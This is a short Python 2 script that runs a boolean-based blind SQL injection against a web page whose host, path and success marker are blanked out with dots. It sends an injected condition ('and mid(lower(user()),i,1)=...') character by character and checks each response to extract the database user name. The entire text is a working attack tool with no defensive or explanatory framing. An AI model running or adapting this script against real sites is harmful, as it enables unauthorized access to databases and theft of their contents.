#encoding = gbk
import httplib
import time
import string
import sys
import random
import urllib

headers = {
	'Cookie':'',
	'User-Agent':'Mozilla/5.0 (Linux;U;Android 2.3.6;en-us;Nuxus S Build/GR)'
}

payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.//')

print 'Tying to retrive user():'

user = ''

for i in range(1,22):

	for payload in payloads:
		conn = httplib.HTTPConnection('.........',timeout=60)
		s = "'and mid(lower(user()),%s,1)='%s' and '1'='1" % (i,payload)
		conn.request(method='GET',url='...........'+urllib.quote(s),headers=headers)
		html_doc = conn.getresponse().read().decode('utf-8')

		if html_doc.find(u'......') > 0:

			user += payload
			print '\n[In Progress]',user
			break
		else:
			print '.'

		conn.close
print '\n[Done],user() is',user
